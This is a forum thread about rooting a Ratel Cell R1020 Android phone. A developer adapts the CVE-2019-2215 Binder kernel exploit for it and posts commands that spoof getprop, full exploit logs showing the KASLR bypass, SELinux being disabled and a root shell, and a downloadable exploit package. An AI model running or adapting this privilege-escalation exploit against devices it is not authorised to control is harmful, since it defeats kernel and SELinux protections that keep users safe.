[help] ratel cell r1020 rooting

Search This thread

arifincaesar

Dec 22, 2016
Hello,

I have a device called RATEL CELL R1020 with OS android 8.0 oreo.
I tried some applications for rooting this smartphone like kingroot, kingoroot, etc but failed. This device can't unlock bootloader, so I see rooting with exploit in youtube like thomasking. Please anyone here help me to rooting my smartphone?
4.4.78perf+ kernel

this attachment is screenshot of the system

Thankyou

Attachments

• Screenshot_20200119-223703.png
    Screenshot_20200119-223703.png
    102.4 KB · Views: 530
  • Screenshot_73.png
    Screenshot_73.png
    61.7 KB · Views: 524
  • bugreport-Cell-OPR1.170623.032-2020-01-28-01-00-54.zip
    2.4 MB · Views: 164
  • bugreport-Cell-OPR1.170623.032-2020-01-28-01-00-54-dumpstate_log-11175.txt
    3.2 KB · Views: 111
  • dumpstate-stats.txt
    7 bytes · Views: 79
Last edited:

j4nn

Jan 4, 2012
@arifincaesar, do you have your phone's firmware in a downloadable form? Can you obtain linux kernel source code for your phone?
I could imagine adapting this (exploit source code here) for your phone, but the kernel binary that is running on the phone is a must pre-requisite. Obviously it would be only a temp root.

there is no way to get firmware of this phone sir..
and there's no way to unlock bootloader..
i think the only way to backup firmware this device is exploit and getting root access without ubl..
there is just said 4.4.78-perf+

In my opinion, there is no exploit that would not need offsets within kernel image in advance.
Because of that you need a copy of kernel binary that is running on the phone.
Obviously it is not possible to back up kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is linux kernel running on the phone (android uses linux kernel) you have legal options to request corresponding kernel source code, because linux kernel is distributed under gpl license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.

Reactions: arifincaesar

arifincaesar

Dec 22, 2016
In my opinion, there is no exploit that would not need offsets within kernel image in advance.
Obviously it is not possible to back up kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Since there is linux kernel running on the phone (android uses linux kernel) you have legal options to request corresponding kernel source code, because linux kernel is distributed under gpl license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.

is that bug when i had activated oem unlock in dev options but cannot unlock with fastboot mode?

arifincaesar

Dec 22, 2016

can you help me please?

Attachments

• Screenshot_78.png
    Screenshot_78.png
    41.7 KB · Views: 196

arifincaesar

Dec 22, 2016
Interesting. Getting kernel space R/W primitives is a nice first step.
But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.

hehe i keep watching your work for exploit sir :)
if there something new exploit i'll try to my phone
thx before

j4nn

Jan 4, 2012
@arifincaesar, try this please:

Code:
cd /data/local/tmp
echo -e '#!/system/bin/sh\ncase "$1" in\n*model) echo G8441 ;;*) echo 47.1.A.8.49 ;;esac' > getprop
chmod 755 getprop

PATH=`pwd`:$PATH ./bindershell

That should try the offsets defined for xz1c. It's a blind try, but let's see.
Please post the log in a text form (copy it via clipboard from the terminal), using the CODE tags in the message (can be used with the # icon in advanced post).

arifincaesar

Dec 22, 2016
Code:
cd /data/local/tmp
echo -e '#!/system/bin/sh\ncase "$1" in\n*model) echo G8441 ;;*) echo 47.1.A.8.49 ;;esac' > getprop
chmod 755 getprop

PATH=`pwd`:$PATH ./bindershell

i can't believe, it work bro i swear :v
is that my phone rooted?

Attachments

• Screenshot_79.png
    Screenshot_79.png
    85.4 KB · Views: 217
Last edited:

arifincaesar

Dec 22, 2016
nope i think my phone is not rooted yet..
i check from root checker it say "sorry root access is not properly installed on this device."

Last edited:

arifincaesar

Dec 22, 2016
@j4nn heres the output
bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
https://github.com/j4nn/renoshell/tree/CVE-2019-2215

MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading extra leaked data
MAIN: task_struct_ptr = ffffffcfe0d68000
MAIN: thread_info_ptr = ffffffd04aa3c000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
kernel slide invalid (0x4ffabc7b50)
kaslr slide 0x0
selinux set to permissive
current task credentials patched

got root, start shell...

Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
Cell:/data/local/tmp # cd
Cell:/ # ls
ls: ./cache: Permission denied
ls: ./init: Permission denied
ls: ./init.environ.rc: Permission denied
ls: ./init.rc: Permission denied
ls: ./init.recovery.qcom.rc: Permission denied
ls: ./init.usb.configfs.rc: Permission denied
ls: ./init.usb.rc: Permission denied
ls: ./init.zygote32.rc: Permission denied
ls: ./init.zygote64_32.rc: Permission denied
ls: ./postinstall: Permission denied
ls: ./ueventd.rc: Permission denied
ls: ./verity_key: Permission denied
acct bt_firmware bugreports charger config d data default.prop dev dsp etc firmware lost+found mnt oem persist proc res root sbin sdcard storage sys system vendor
1|Cell:/ #

j4nn

Jan 4, 2012
@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Without a kernel binary, it is difficult to implement a full temp root exploit.
I guess it could be doable, unfortunately I do not have the time for it.

arifincaesar

Dec 22, 2016
@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Without a kernel binary, it is difficult to implement a full temp root exploit.
I guess it could be doable, unfortunately I do not have the time for it.

hehe thanks for information sir.. :)

j4nn

Jan 4, 2012
cve-2019-2215 based temp root exploit for ratel cell r1020

Here is a temp root exploit tailored specifically for RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018). The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).

Unfortunately RATEL CELL r1020 firmware is not publicly available, so it had not been possible to get a kernel image for analysis.
Luckily the first stage of the exploit designed for sony xperia xz1/xz1/xz1c worked, providing kernel space R/W primitives.
Eventually kernel memory dump has been retrieved (after KASLR bypass done in a generic way), so implementation of the final stage to bypass selinux and patch credentials to get root could be done.

Please find the result of my work attached here, it obviously is not tested as I do not have that phone, but I assume it would work as using similarly calculated stuff worked with my xz1c phone.
Please see the xperia phones exploit here for usage howto, including possibility to setup magisk from the exploit (modified script without sony specific stuff is already included). Just download the Magisk-v19.3-Manager-v7.1.2.zip from the linked post and use together with stuff from ratel-cell-temp-root.zip attached here.

EDIT: Updated ratel cell temp root with v2, supposed to work also with ratel cell having May 1, 2018 security patch level.

Please post the log (in [ CODE ] tags) and/or screenshots from your testing, possibly including even magisk setup, if bindershell exploit worked.
If you like my work, you can donate to me via paypal (including card payment) or bitcoin - for details just follow the "Donate to Me" button please. Thank you.

Attachments

• ratel-cell-temp-root-v2.zip
    9.5 KB · Views: 191
Last edited:

arifincaesar

Dec 22, 2016
Here is a temp root exploit tailored specifically for RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018). The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).

Unfortunately RATEL CELL r1020 firmware is not publicly available, so it had not been possible to get a kernel image for analysis.
Luckily the first stage of the exploit designed for sony xperia xz1/xz1/xz1c worked, providing kernel space R/W primitives.
Eventually kernel memory dump has been retrieved (after KASLR bypass done in a generic way), so implementation of the final stage to bypass selinux and patch credentials to get root could be done.

Please find the result of my work attached here, it obviously is not tested as I do not have that phone, but I assume it would work as using similarly calculated stuff worked with my xz1c phone.
Please see the xperia phones exploit here for usage howto, including possibility to setup magisk from the exploit (modified script without sony specific stuff is already included). Just download the Magisk-v19.3-Manager-v7.1.2.zip from the linked post and use together with stuff from ratel-cell-temp-root.zip attached here.

Please post the log (in [ CODE ] tags) and/or screenshots from your testing, possibly including even magisk setup, if bindershell exploit worked.

yes, it work sir thank you so much here is the log
but i think there other problem i will posting it later here

Code:
Cell:/data/local/tmp $ ./bindershellnew

bindershell - temp root shell using CVE-2019-2215, tailored for RATEL CELL R1020
https://github.com/j4nn/renoshell/tree/CVE-2019-2215

MAIN: starting exploit for devices with waitqueue at 0x98
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading extra leaked data
MAIN: task_struct_ptr = ffffffd4316e9b00
MAIN: thread_info_ptr = ffffffd471268000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
attempting kaslr bypass: leaked ptr 0xffffff8a82608658
kernel base=0xffffff8a81480000 slide=0xa79400000
selinux set to permissive
current task credentials patched

got root, start shell...

Cell:/data/local/tmp # getenforce
Permissive
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:toolbox:s0
Cell:/data/local/tmp # uname -a
Linux localhost 4.4.78-perf+ #1 SMP PREEMPT Tue Mar 6 11:00:11 CST 2018 aarch64
Cell:/data/local/tmp #

Attachments

• Screenshot_20200303-085631.png
    Screenshot_20200303-085631.png
    142.8 KB · Views: 189
  • Screenshot_20200303-085635.png
    Screenshot_20200303-085635.png
    234.7 KB · Views: 190
  • Screenshot_20200303-085437.png
    Screenshot_20200303-085437.png
    116.1 KB · Views: 195

yusuv

Mar 29, 2012
Jakarta, Kalimalang
Hi there sir @j4nn .
I'm yusuv, ratel cell user. I've been following this thread.
And lately seems the exploit works as intended.
The things is, ratel cell not only have the January patch on all the devices. I've tried the exploit and its stuck on the build number prop and it won't go any further.
Afaik, ratel have 2 ROM builds, one patch is January which is you build the exploit for, the other one is May 1, 2018 patch. With also different build number.
On behalf Ratel Cell user with the may patch. I'm here to ask you, is there any way for us with the May patch being able to root our device?
Thanks in advance.

Last edited:

Top Liked Posts

• There are no posts matching your filters.
    @yusuv, @herudi, @arifincaesar, I just added ratel-cell-temp-root-v2.zip into post#15 that is supposed to work also with May 2018 security patch level. Enjoy the temp root for your ratel cell r1020 phone:)
    @yusuv, there are things that are interesting for me to do just out of pure challenge or for personal use.
    But there are also tasks that are nearly impossible to do, so any amount of money would not make any difference.
    So again, if you like to donate, do it for the work done already.
    I do not like the bounty threads here on xda, there are lot of promises not kept unfortunately.

hello sir.. i'm sorry i can't donate you to much..
    but, one day if i have some money.. i will donate you more..
    thanks for your help..
    i hope we can be friend and not angry to me :)
    @Ndangd, it is not possible to install custom recovery with just a temp root. You need to unlock bootloader first.
    @yusuv, I am sorry, I do not have the time to do that.
    The already implemented root for ratel cell posted above cost me many long evenings.

In any case, if you like my work, you can donate to me via paypal (including card payment) or bitcoin - for details just follow the "Donate to Me" button please. Thank you.
    cve-2019-2215 based temp root exploit for ratel cell r1020

EDIT: Updated ratel cell temp root with v2, supposed to work also with ratel cell having May 1, 2018 security patch level.

If you like my work, you can donate to me via paypal (including card payment) or bitcoin - for details just follow the "Donate to Me" button please. Thank you.
    can you help me please?
    Interesting. Getting kernel space R/W primitives is a nice first step.
    But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.